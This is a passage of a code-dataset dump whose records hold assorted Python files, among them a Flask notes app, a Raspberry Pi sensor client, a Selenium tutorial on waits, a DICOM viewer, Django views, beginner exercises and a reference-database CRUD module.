value\n","sub_path":"Lab 4 - Universal algorhitm/create_bank.py","file_name":"create_bank.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"573218816","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom operator import or_\nfrom DB import Notes, db\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n myNotes = 
Notes.query.order_by(Notes.create_at.desc()).all()\n readNote = Notes.query.order_by(Notes.create_at.desc()).first()\n return render_template('items/notes.html', notes=myNotes, read=readNote)\n\n@app.route('/read/')\ndef read(id):\n readNote = Notes.query.get(id)\n myNotes = Notes.query.order_by(Notes.create_at.desc()).all()\n return render_template('items/notes.html', notes=myNotes, read=readNote)\n\n@app.route('/add')\ndef add():\n myNotes = Notes.query.order_by(Notes.create_at.desc()).all()\n return render_template('items/add.html', notes=myNotes)\n\n@app.route('/remove/')\ndef remove(id):\n myNote = Notes.query.get(id)\n db.session.delete(myNote)\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/edit/')\ndef edit(id):\n myNote = Notes.query.get(id)\n myNotes = Notes.query.order_by(Notes.create_at.desc()).all()\n return render_template('items/edit.html', notes=myNotes, read=myNote)\n\n@app.route('/editForm', methods=['POST'])\ndef editForm():\n id = request.form['id']\n title = request.form['title']\n contain = request.form['contain']\n myNote = Notes.query.get(id)\n # Update\n myNote.title = title\n myNote.contain = contain\n myNote.update_at = datetime.now()\n db.session.commit()\n\n return redirect(url_for('index'))\n\n@app.route('/addForm', methods=['POST'])\ndef addForm():\n title = request.form['title']\n contain = request.form['contain']\n myNote = Notes(title, contain)\n db.session.add(myNote)\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/search', methods=['GET'])\ndef search():\n q = ''\n read = None\n if request.args.get('q'):\n q = request.args.get('q')\n myNotes = Notes.query.filter(or_(\n Notes.title.like('%{0}%'.format(q)),\n Notes.contain.like('%{0}%'.format(q)))).order_by(\n Notes.create_at.desc()).all()\n if myNotes:\n read = myNotes[0]\n return render_template('items/notes.html', notes=myNotes, read=read)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"Papernote.py","file_name":"Papernote.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"280565320","text":"import tensorflow as tf\nimport os\nfrom model import MODEL\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_boolean(\"is_train\", True, \"if the train\")\nflags.DEFINE_boolean(\"is_eval\", False, \"if the eval\")\nflags.DEFINE_string(\"model_dir\", 'Model', \"the dir of model\")\nflags.DEFINE_string(\"checkpoint_dir\", '20181120', \"the checkpoint of model\")\n\nflags.DEFINE_integer(\"block_x2\", 4, \"the num of 64block\")\nflags.DEFINE_integer(\"block_x3\", 4, \"the num of 96block\")\nflags.DEFINE_integer(\"block_x4\", 4, \"the num of 128block\")\n\nflags.DEFINE_float(\"learning_rate\", 0.01, \"the learning rate\")\nflags.DEFINE_integer(\"image_size\", 32, \"the size of image input\")\nflags.DEFINE_integer(\"batch_size\", 64, \"the size of batch\")\nflags.DEFINE_integer(\"kernel_size\", 3, \"the size of kernel\")\nflags.DEFINE_integer(\"out_channel\", 64, \"the channel of output\")\nflags.DEFINE_string(\"gpu_device\", '1', \"the number of gpu using\")\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = FLAGS.gpu_device\n\n\ndef main(_):\n model = MODEL(tf.Session(),\n is_train=FLAGS.is_train,\n is_eval=FLAGS.is_eval,\n image_size=FLAGS.image_size,\n batch_size=FLAGS.batch_size,\n kernel_size=FLAGS.kernel_size,\n out_channel=FLAGS.out_channel,\n block_x2=FLAGS.block_x2,\n block_x3=FLAGS.block_x3,\n block_x4=FLAGS.block_x4)\n
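 # NOTE: only the training path is wired up below -- FLAGS.is_eval is defined above\n # but never branched on. A sketch of the missing branch (hypothetical; assumes MODEL\n # exposes an eval() counterpart to train(), which this file does not show):\n # elif model.is_eval:\n # model.eval(FLAGS)\n if 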
model.is_train:\n model.train(FLAGS)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"469209131","text":"#!/usr/bin/python\n\nfrom threading import current_thread\nimport threading\n\nfrom twisted.internet import reactor\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.internet.error import ReactorNotRunning\n\nfrom autobahn.util import utcnow\nfrom autobahn.twisted.util import sleep\nfrom autobahn.twisted.wamp import ApplicationSession, ApplicationRunner\nfrom autobahn.wamp.exception import ApplicationError\n\nimport RPi.GPIO as GPIO\n\nimport os\nimport argparse\n\nimport six\n\nimport txaio\ntxaio.use_twisted()\n\n# OK\ndef get_serial():\n \"\"\"\n Get the Pi's serial number.\n \"\"\"\n with open('/proc/cpuinfo') as fd:\n for line in fd.read().splitlines():\n line = line.strip()\n if line.startswith('Serial'):\n _, serial = line.split(':')\n return serial.strip().lstrip('0')\n\n# probably\ndef config_light_sensor_gpio(channel):\n \"\"\"\n configure the Light Sensor GPIO Pin\n \"\"\"\n\n GPIO.setmode(GPIO.BCM)\n\n # declare GPIO Pin as input and enable the pull-down resistor\n GPIO.setup(channel, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\nclass LightSensorComponent(ApplicationSession):\n \"\"\"Our component wrapping a light sensor which is threshold triggered.\"\"\"\n\n @inlineCallbacks\n def onJoin(self, details):\n self.log.info('Session joined on thread {thread_id}: {details}', thread_id=current_thread().ident, details=details)\n\n \"\"\"Callback when the WAMP session has been established and is ready for use.\"\"\"\n # get the Pi serial number\n self._serial = get_serial()\n\n # all procedures/events will have this URI prefix\n self._prefix = u'io.crossbar.demo.iotstarterkit.{}.temperature_alarm'.format(self._serial)\n\n # print startup info\n self.log.info(\"Crossbar.io IoT Starterkit Serial No.: {serial}\", serial=self._serial)\n self.log.info(\"LightSensorComponent connected: {details}\", details=details)\n\n # get component user extra configuration\n cfg = self.config.extra\n\n # initialize the light sensor\n self._light_sensor_pin = cfg['light_sensor_pin']\n GPIO.setwarnings(False)\n config_light_sensor_gpio(self._light_sensor_pin)\n\n # # setup edge detection for the light sensor\n # GPIO.add_event_detect(self._light_sensor_pin, GPIO.RISING, callback=self.light_change, bouncetime=50)\n\n\n # simple polling for now\n self._is_hot = False\n\n def printit():\n threading.Timer(0.1, printit).start()\n # print \"Hello, World!\"\n if GPIO.input(self._light_sensor_pin):\n if not self._is_hot:\n self._is_hot = True\n self.publish(u'{}.is_hot'.format(self._prefix))\n print(\"input is HIGH\")\n else:\n if self._is_hot:\n self._is_hot = False\n self.publish(u'{}.is_cold'.format(self._prefix))\n print(\"input is LOW\")\n\n printit()\n\n # remember startup timestamp\n self._started = utcnow()\n\n # flag indicating whether the sensor currently reads dark\n self._is_dark = False\n\n # register procedures (the bound methods, not the flag attributes)\n for proc in [\n (self.started, u'started'),\n (self.is_dark, u'is_dark'),\n ]:\n uri = u'{}.{}'.format(self._prefix, proc[1])\n yield self.register(proc[0], uri)\n self.log.info('registered procedure {uri}', uri=uri)\n\n self._is_ready = True\n self.log.info(\"LightSensorComponent ready!\")\n\n def started(self):\n \"\"\"\n Get UTC timestamp when the component started.\n\n :returns: ISO8601 formatted 
UTC timestamp when the component started.\n :rtype: str\n \"\"\"\n return self._started\n\n def is_dark(self):\n \"\"\"\n Check whether the light sensor currently reads dark.\n\n :returns: Flag indicating whether the sensor input is currently high.\n :rtype: bool\n \"\"\"\n return self._is_dark\n\n def light_change(self, portnr=1000):\n \"\"\"is called by the edge detection and runs in a new thread;\n calls the _light_change() method which performs the action triggered by the sensor \"\"\"\n self.log.info('GPIO edge callback on thread {thread_id}', thread_id=current_thread().ident)\n reactor.callFromThread(self._light_change)\n\n @inlineCallbacks\n def _light_change(self):\n \"\"\"light sensor edge event handler\"\"\"\n\n self.log.info('Light sensor edge event handler on thread {thread_id}', thread_id=current_thread().ident)\n\n self._is_dark = GPIO.input(self._light_sensor_pin)\n self.log.info(\"GPIO input: {state}\", state=self._is_dark)\n\n # \"\"\" publish current state\"\"\"\n # if self._is_dark:\n # self.publish(u'{}.is_hot'.format(self._prefix))\n # self.log.info(\"is hot\")\n # # \"\"\"wait for a short time\"\"\"\n # yield sleep(1 / 1000.)\n # else:\n # self.publish(u'{}.is_cold'.format(self._prefix))\n # self.log.info(\"is cold\")\n # yield sleep(1 / 1000.)\n\n def onLeave(self, details):\n self.log.info(\"session closed: {details}\", details=details)\n self.disconnect()\n GPIO.output(self._light_sensor_pin, GPIO.LOW)\n GPIO.cleanup()\n\n def onDisconnect(self):\n self.log.info(\"connection closed\")\n try:\n reactor.stop()\n except ReactorNotRunning:\n pass\n\n\nif __name__ == '__main__':\n\n # Crossbar.io connection configuration\n\n url = os.environ.get('CBURL', u'wss://demo.crossbar.io/ws')\n realm = os.environ.get('CBREALM', u'crossbardemo')\n\n # parse command line parameters\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--debug', action='store_true', help='Enable debug output.')\n parser.add_argument('--url', dest='url', type=six.text_type, default=url, help='The router URL (default: \"ws://localhost:8080/ws\").')\n parser.add_argument('--realm', dest='realm', type=six.text_type, default=realm, help='The realm to join (default: \"realm1\").')\n\n args = parser.parse_args()\n\n if args.debug:\n txaio.start_logging(level='debug')\n else:\n txaio.start_logging(level='info')\n\n # custom configuration data\n extra = {\n # GPIO pin of the light sensor\n u'light_sensor_pin': 14,\n }\n\n # create and start app runner for our app component\n runner = ApplicationRunner(url=args.url, realm=args.realm, extra=extra)\n runner.run(LightSensorComponent, auto_reconnect=True)\n","sub_path":"device/pi/components/_work/temperature_sensor/app/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"175805176","text":"class Solution(object):\n def findPaths(self, m, n, N, i, j):\n res = [0]\n self.bfs(res, m, n, N, i, j)\n return res[0]\n\n def bfs(self, res, m, n, N, i, j):\n if i < 0 or j < 0 or i == m or j == n:\n res[0] += 1\n return\n if N == 0:\n return\n self.bfs(res, m, n, N - 1, i + 1, j)\n self.bfs(res, m, n, N - 1, i - 1, j)\n self.bfs(res, m, n, N - 1, i, j + 1)\n self.bfs(res, m, n, N - 1, i, j - 1)\n\n# Solution 2\n\n def findPaths(self, m, n, N, i, j):\n if N <= 0: return 0\n count = [[0 for k in range(n)] for l in range(m)]\n count[i][j] = 1\n res = 0\n dirs = [[1,0],[-1,0],[0,1],[0,-1]]\n \n
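 # NOTE: iterative DP -- count[r][c] holds how many paths of the current length end\n # at (r, c); each step, any move that crosses the boundary adds count[r][c] to res\n # (mod 1e9+7), while in-grid moves flow into temp. O(N*m*n) time versus the\n # exponential recursion of the first solution above.\n for step in 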
range(N):\n temp = [[0 for i in range(n)] for j in range(m)]\n for r in range(m):\n for c in range(n):\n for p in dirs:\n nr = r + p[0]\n nc = c + p[1]\n if nr < 0 or nc < 0 or nr >= m or nc >= n:\n res = (res + count[r][c]) % (10**9 + 7)\n else:\n temp[nr][nc] = (temp[nr][nc] + count[r][c]) % (10**9 + 7)\n count = temp\n return res","sub_path":"LC/576_Out_of_Boundary_Paths.py","file_name":"576_Out_of_Boundary_Paths.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"56067407","text":"'''\n@author:lvming\n@time:2021/6/23\n'''\nfrom time import sleep\n\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n'''\n课程回顾:\n 1.常规元素操作,iframe和句柄的切换。\n 2.注册电商系统账号,实现自动化注册与登录流程。\n\t作业问题:\n\t 1.很多同学,听了课和没听课是一样的\n\t 2.copy xpath会有问题的。\n\t 3.By对象实现元素定位有问题嘛?\n\t 4.数据分离文件。所有被分离的元素在定义和声明的时候是常量。常量是大写的。不是小写的。\n\t 5.断言。有点勉强,在UI的阶段下断言只是为了校验最后的结果。\n'''\n# 等待的用途:\n# 自动化测试是基于机器来实现的测试行为,本质意义上还是点点点的行为操作。在运行测试的代码时经常会因为代码的问题导致运行时失败。\n# 自动化测试首先要求的是成功率,也就是稳定性。\n# 自动化测试流程的稳定性需要通过等待来保障。代码不需要考虑运行时间,但是代码运行的对象要考虑时间。\n\n# 三类等待:\n'''\n# 1.强制等待\n 不考虑整体代码的连贯性和逻辑性,运行到强制等待时,就直接停止指定的时间,时间结束后,再继续运行后面的代码\n sleep表示强制等待,以秒为时间单位,是在time包下的类\n 优势:容易上手。有需要的时候直接调用即可。对于新手特别友好\n 劣势:迟钝。在自动化执行时会造成大量的时间浪费。\n 一般而言都是新手在使用sleep,或者是临时性的调试应用。或者特定情况。\n# 2.隐式等待\n 悄悄的等待。本质意义上而言是driver的一个设置项。\n 只需要设置一次,即可在driver的整个生命周期中生效\n 隐式等待的时间也是基于秒来进行等待的。但是隐式等待会在找到元素后直接结束\n 如果没有找到元素,就会等到设置的最大时间,等待的过程中一直会寻找这个元素\n 如果最终没有找到元素,就继续运行下一行代码。\n 隐式等待必须要等待页面加载完成之后再生效。所以效率的提升不是太明显。\n 没有办法指定到元素来进行等待。\n 一般而言隐式等待都会添加。添加的时间一般是5秒或者10秒\n 优势:在整个webdriver声明周期中,只需要设置一次即可。\n# 3.显式等待\n 专门针对元素来进行等待的。\n 和强制等待一样,在需要调用的时候就要定义。\n 显式等待分为until和until_not两种函数来实现等待,作用是完全相反的\n 如果元素未找到,会抛出timeout的异常。\n 显式等待在执行的时候会有一个return.返回等待的元素\n 优势:可以直接对单个元素进行等待,效率最高。\n 劣势:代码太长了,用起来比较麻烦。\n 显式等待还可以当做断言的形式来使用。\n在实际的自动化测试中,等待是综合运用的。\n当显示与隐式同时存在的时候:\n\t1.如果显示等待的元素找不到,则抛出超时异常。\n\t2.基于两者等待机制的时间设定,默认遵循时间更长的等待。\n弹窗机制:\n\t很久没用过了。现在的系统很少有了。因为所有的弹窗交互都是基于div层直接实现。\n\t所有形式的弹窗不是页面弹出,二十浏览器弹出。\n\t在浏览器中有三类弹窗:\n\t 1.alert:确认\n\t 2.prompt:支持输入并确定\n\t 3.confirm:确定与 取消\n\t 如果弹窗的样式与操作系统或者浏览器一个风格,则一定是alert\n 如果弹窗的样式与软件系统一个风格,一般都是div层,只需要考虑是否存在iframe即可\n'''\n\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome()\n# 隐式等待\ndriver.implicitly_wait(10)\ndriver.maximize_window()\ndriver.get('http://www.baidu.com')\ndriver.find_element('id','kw').send_keys('虚竹')\ndriver.find_element('id','su').click()\n# 强制等待\n# sleep(2)\n# 显式等待\nel = WebDriverWait(driver,5,0.5).until(\n lambda el1:driver.find_element('xpath','//*[@id=\"1\"]/h3/a'),\n message='元素查找失败')\nel.click()\n# WebDriverWait(driver,5,0.5).until_not(\n# lambda el:driver.find_element('xpath','//*[@id=\"1\"]/h3/a'),\n# message='元素查找失败')\n# driver.find_element('xpath','//*[@id=\"1\"]/h3/a').click()\n# driver.find_element('xpath','//*[@id=\"1\"]/h3/a').click()\nprint('这是a1元素后的代码')\ndriver.quit()\n\n#alert弹窗处理\nalert = driver.switch_to.alert()\nalert.accept()\n#confirm弹窗处理\nalert.accept()\nalert.dismiss()\n#prompt\nalert.sendkeys()\nalert.accept()\nalert.dismiss()\n#获取alert弹窗的文本\nalert = alert.text\n# 课后作业:\n# 通过自动化测试行为,实现电商的下单流程。\n# \t登录-搜索商品-添加商品属性-加入购��车-校验购物车是否添加成功\n# iphone6\n","sub_path":"web01/selenium05.py","file_name":"selenium05.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"305471574","text":"lista = []\npares = []\nimpares = []\nwhile True:\n n = int(input('Enter a number[0 to exit]: '))\n if n == 0:\n break\n else:\n lista.append(n)\nfor c in lista:\n if c % 2 == 
0:\n pares.append(c)\n else:\n impares.append(c)\nprint(f'Odd: {impares}')\nprint(f'Even: {pares}')\nprint(f'All: {lista}')\n","sub_path":"exercicosPython/exercises/ex001_114/ex082evenOdds.py","file_name":"ex082evenOdds.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"148143006","text":"u_input= [0,1,2,3,4,5]\nprint(u_input)\nno_left_shifts = int(raw_input('\\nEnter number of left shifts\\n'))\nlength_array = len(u_input)\n\nnew_list = []\n\nfor i,v in enumerate(u_input):\n new_index = (i + no_left_shifts) % length_array\n new_list.append(u_input[new_index])\n\nprint(new_list)\n","sub_path":"Documents/Dev/Projects/CrackingCodingIn/shiftIndex.py","file_name":"shiftIndex.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"399156568","text":"import os\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport pydicom\nimport sys \nimport argparse\n\ndef usage():\n print (\" -d directory of the dicom folder | -h help\")\n\ndef readDirectory(path):\n\n ''' This method reads the directory and returns a list of DICOM files'''\n imageSet = []\n\n # Read the files ending with the .dcm extension\n for filename in os.listdir(path):\n if filename.endswith('.dcm'):\n imgPath=os.path.join(path, filename)\n imageSet.append(pydicom.dcmread(imgPath))\n return imageSet\n\ndef displayThumbnils(imageSet):\n '''This method takes a list of DICOM images and shows them in a thumbnail layout'''\n\n # Define the grid size for viewing \n height=np.ceil(np.sqrt(len(imageSet))).astype(int)\n width=len(imageSet)//height + 1\n\n \n # Define the size of each individual figure in the grid\n fig=plt.figure(figsize=(15,15))\n\n # Go through all the files and put them in the figure \n for (idx,data) in enumerate(imageSet):\n fig.add_subplot(height,width,idx+1)\n plt.axis('off')\n plt.imshow(data.pixel_array , cmap=plt.cm.bone)\n plt.show()\n \n\nif __name__ == \"__main__\":\n #path='C:\\\\Users\\\\Niaz\\\\OneDrive\\\\Study Materials\\\\UBx\\\\New folder\\\\CT2.55\\\\'\n parser=argparse.ArgumentParser()\n parser.add_argument(\"-d\",\"--dir\", help=\"Please Enter the Dicom Directory in following format -d directory \\n\" )\n \n # Read arguments from the command line\n args = parser.parse_args()\n\n if args.dir:\n dicomList=readDirectory(args.dir)\n displayThumbnils(dicomList)\n else:\n usage()\n sys.exit(2)\n","sub_path":"displayThumbnil.py","file_name":"displayThumbnil.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"244819678","text":"import json as js\n\n\ndef count(path):\n \"\"\"\n Tally the JSON-format recommendation results and print them to the console\n :param path: directory path\n :return: \n \"\"\"\n with open(path+'recommend_list') as f:\n n = 0\n line = f.readline()\n full_count={}\n full_count['relation']=0\n full_count['movie']=0\n full_count['show']=0\n while line:\n if line != None:\n n+=1\n item = js.loads(line)\n for k,v in item.items():\n for i in v:\n for k2,v2 in i.items():\n full_count[k2]=full_count[k2]+len(v2)\n line=f.readline()\n with open(path+'recommend_count','a',encoding='utf-8') as f5:\n data = js.dumps(full_count)\n f5.write('推荐关系量:'+str(n)+data+'\\n')\n print(n, full_count)\n","sub_path":"count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"80539407","text":"# Inez Fennelly 7th March 2018\r\n# Fizz Buzz https://en.wikipedia.org/wiki/Fizz_buzz\r\n\r\ni = 1\r\n\r\nwhile i <= 30:\r\n if (i % 3 == 0) and (i % 5 == 0):\r\n print (\"Fizz Buzz\")\r\n elif i % 3 == 0:\r\n print (\"Fizz\")\r\n elif i % 5 == 0:\r\n print (\"Buzz\")\r\n else:\r\n print (i)\r\n i = i + 1\r\n","sub_path":"FizzBuss.py","file_name":"FizzBuss.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"319821132","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\nfrom .models import Name,Therapy\nfrom .forms import NameForm,TherapyForm\n\n\ndef diseases(request):\n names=Name.objects.all()\n context={'names':names}\n return render(request,'Disease/diseases.html',context)\n\n\ndef new_disease(request):\n if request.method=='GET':\n form=NameForm()\n else:\n form=NameForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('Disease:diseases'))\n\n context={'form':form}\n return render(request,'Disease/new_disease.html',context)\n\n\ndef illness(request,disease_id):\n disease=Name.objects.get(id=disease_id)\n therapys=disease.therapy_set.order_by('-date_added')\n context={'disease':disease,'therapys':therapys}\n return render(request,'Disease/illness.html',context)\n\n\ndef edit_therapy(request,therapy_id):\n therapy=Therapy.objects.get(id=therapy_id)\n name=therapy.name\n if request.method!='POST':\n form=TherapyForm(instance=therapy)\n else:\n form=TherapyForm(instance=therapy, data=request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('Disease:illness',\n args=[name.id]))\n\n context={'therapy':therapy,'name':name,'form':form}\n return render(request,'Disease/edit_therapy.html',context)\n\ndef new_therapy(request,name_id):\n name=Name.objects.get(id=name_id)\n\n if request.method!='POST':\n form=TherapyForm()\n else:\n form=TherapyForm(request.POST)\n new_therapy=form.save(commit=False)\n new_therapy.name=name\n new_therapy.save()\n return HttpResponseRedirect(reverse('Disease:illness',args=[name.id]))\n\n context={'name':name,'form':form}\n return render(request,'Disease/new_therapy.html',context)\n\ndef delete_name(request,name_id):\n name=Name.objects.get(id=name_id)\n name.delete()\n return HttpResponseRedirect(reverse('Disease:diseases'))\n","sub_path":"BreedingSite/Disease/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"397093121","text":"data = int(input())\nsugar = [(data//3)+1, (data//5)+1]\n\ncount = sugar[0] + sugar[1]\nflag = True\n\nfor i in range(sugar[0]):\n for j in range(sugar[1],-1,-1):\n if 3*i + 5*j == data:\n count = min(i+j,count)\n flag = False\n\n else:\n continue\n\nif flag:\n print(-1)\n\nelse:\n print(count)\n\n","sub_path":"PS/baekjoon/단계별로 풀어보기/b_2839_설탕배달.py","file_name":"b_2839_설탕배달.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"258158284","text":"\"\"\"\nreference_crud.py\n=================\n\"\"\"\nimport logging\nimport re\nfrom datetime import datetime\nfrom typing import Any, Dict, List\n\nfrom fastapi import HTTPException, status\nfrom fastapi.encoders import jsonable_encoder\nfrom sqlalchemy import ARRAY, Boolean, String, func\nfrom 
sqlalchemy.orm import Session\nfrom sqlalchemy.sql.expression import cast, or_\n\nfrom agr_literature_service.api.crud import (cross_reference_crud,\n reference_comment_and_correction_crud)\nfrom agr_literature_service.api.crud.cross_reference_crud import set_curie_prefix\nfrom agr_literature_service.api.crud.mod_reference_type_crud import insert_mod_reference_type_into_db\nfrom agr_literature_service.api.crud.reference_resource import create_obj\nfrom agr_literature_service.api.crud.reference_utils import get_reference\nfrom agr_literature_service.api.models import (AuthorModel, CrossReferenceModel,\n MeshDetailModel,\n ObsoleteReferenceModel,\n ReferenceCommentAndCorrectionModel,\n ReferenceModel,\n ResourceModel,\n CopyrightLicenseModel,\n CitationModel)\nfrom agr_literature_service.api.schemas import ReferenceSchemaPost, ModReferenceTypeSchemaRelated\nfrom agr_literature_service.api.crud.mod_corpus_association_crud import create as create_mod_corpus_association\nfrom agr_literature_service.api.crud.workflow_tag_crud import (\n create as create_workflow_tag,\n patch as update_workflow_tag,\n show as show_workflow_tag\n)\nfrom agr_literature_service.api.crud.topic_entity_tag_crud import (\n patch as update_topic_entity_tag,\n create as create_topic_entity_tag\n)\nfrom agr_literature_service.global_utils import get_next_reference_curie\nfrom agr_literature_service.api.crud.referencefile_crud import destroy as destroy_referencefile\n\nlogger = logging.getLogger(__name__)\n\n\ndef create(db: Session, reference: ReferenceSchemaPost): # noqa\n \"\"\"\n\n :param db:\n :param reference:\n :return:\n \"\"\"\n\n logger.debug(\"creating reference\")\n logger.debug(reference)\n add_separately_fields = [\"mod_corpus_associations\", \"workflow_tags\", \"topic_entity_tags\", \"mod_reference_types\"]\n list_fields = [\"authors\", \"tags\", \"mesh_terms\", \"cross_references\"]\n remap = {'authors': 'author',\n 'mesh_terms': 'mesh_term',\n 'cross_references': 'cross_reference',\n 'mod_reference_types': 'mod_reference_type'}\n reference_data = {} # type: Dict[str, Any]\n author_names_order = []\n\n if reference.cross_references:\n for cross_reference in reference.cross_references:\n if db.query(CrossReferenceModel).filter(CrossReferenceModel.curie == cross_reference.curie).first():\n raise HTTPException(status_code=status.HTTP_409_CONFLICT,\n detail=f\"CrossReference with id {cross_reference.curie} already exists\")\n logger.debug(\"done x ref\")\n curie = get_next_reference_curie(db)\n reference_data[\"curie\"] = curie\n\n for field, value in vars(reference).items():\n if value is None:\n continue\n logger.debug(f\"processing {field} {value}\")\n if field in list_fields:\n db_objs = []\n for obj in value:\n obj_data = jsonable_encoder(obj)\n db_obj = None\n if field in [\"authors\"]:\n db_obj = create_obj(db, AuthorModel, obj_data, non_fatal=True)\n if db_obj.name:\n author_names_order.append((db_obj.name, db_obj.order))\n elif field == \"mesh_terms\":\n db_obj = MeshDetailModel(**obj_data)\n elif field == \"cross_references\":\n db_obj = CrossReferenceModel(**obj_data)\n set_curie_prefix(db_obj)\n db.add(db_obj)\n db_objs.append(db_obj)\n if field in remap:\n reference_data[remap[field]] = db_objs\n else:\n reference_data[field] = db_objs\n elif field == \"resource\":\n resource = db.query(ResourceModel).filter(ResourceModel.curie == value).first()\n if not resource:\n raise HTTPException(status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"Resource with curie {value} does not exist\")\n 
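# attach the looked-up ORM object (not the curie string) so SQLAlchemy can\n # populate the resource relationship when the new reference is flushed\n 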
reference_data[\"resource\"] = resource\n elif field == \"merged_into_reference_curie\":\n merged_into_obj = db.query(ReferenceModel).filter(ReferenceModel.curie == value).first()\n if not merged_into_obj:\n raise HTTPException(status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"Merged_into Reference with curie {value} does not exist\")\n reference_data[\"merged_into_reference\"] = merged_into_obj\n elif field in add_separately_fields:\n continue\n else:\n reference_data[field] = value\n logger.debug(\"finished processing {} {}\".format(field, value))\n\n logger.debug(\"add reference\")\n # reference_data['citation'] = citation_from_data(reference_data,\n # \"; \".join([x[0] for x in sorted(author_names_order,\n # key=lambda x: x[1])]))\n reference_db_obj = ReferenceModel(**reference_data)\n logger.debug(\"have model, save to db\")\n db.add(reference_db_obj)\n logger.debug(\"saved\")\n db.commit()\n db.refresh(reference_db_obj)\n for field, value in vars(reference).items():\n logger.debug(\"Processing mod corpus asso\")\n if field == \"mod_corpus_associations\":\n if value is not None:\n for obj in value:\n obj_data = jsonable_encoder(obj)\n obj_data[\"reference_curie\"] = curie\n try:\n create_mod_corpus_association(db, obj_data)\n except HTTPException:\n logger.warning(\"skipping mod corpus association to a mod that is already associated to \"\n \"the reference\")\n elif field == \"workflow_tags\":\n if value is not None:\n for obj in value:\n obj_data = jsonable_encoder(obj)\n obj_data[\"reference_curie\"] = curie\n try:\n if \"reference_workflow_tag_id\" in obj_data and obj_data[\"reference_workflow_tag_id\"]:\n update_workflow_tag(db, obj_data[\"reference_workflow_tag_id\"], obj_data)\n else:\n create_workflow_tag(db, obj_data)\n except HTTPException:\n logger.warning(\"skipping workflow_tag to a mod that is already associated to \"\n \"the reference\")\n elif field == \"topic_entity_tags\":\n if value is not None:\n for obj in value:\n obj_data = jsonable_encoder(obj)\n obj_data[\"reference_curie\"] = curie\n try:\n if \"reference_topic_entity_tag_id\" in obj_data and obj_data[\"reference_topic_entity_tag_id\"]:\n update_topic_entity_tag(db, obj_data[\"reference_topic_entity_tag_id\"], obj_data)\n else:\n create_topic_entity_tag(db, obj_data)\n except HTTPException:\n logger.warning(\"skipping topic_entity_tag as that is already associated to \"\n \"the reference\")\n elif field == \"mod_reference_types\":\n for obj in value or []:\n insert_mod_reference_type_into_db(db, reference.pubmed_types, obj.source, obj.reference_type,\n reference_db_obj.reference_id)\n return curie\n\n\ndef destroy(db: Session, curie_or_reference_id: str):\n \"\"\"\n\n :param db:\n :param curie_or_reference_id:\n :return:\n \"\"\"\n reference_id = int(curie_or_reference_id) if curie_or_reference_id.isdigit() else None\n reference = db.query(ReferenceModel).filter(or_(\n ReferenceModel.curie == curie_or_reference_id,\n ReferenceModel.reference_id == reference_id)).one_or_none()\n\n if not reference:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Reference with curie or reference_id {curie_or_reference_id} not found\")\n for referencefile in reference.referencefiles:\n destroy_referencefile(db, referencefile.referencefile_id)\n db.delete(reference)\n db.commit()\n\n return None\n\n\ndef patch(db: Session, curie_or_reference_id: str, reference_update) -> dict:\n \"\"\"\n\n :param db:\n :param curie_or_reference_id:\n :param reference_update:\n :return:\n \"\"\"\n\n 
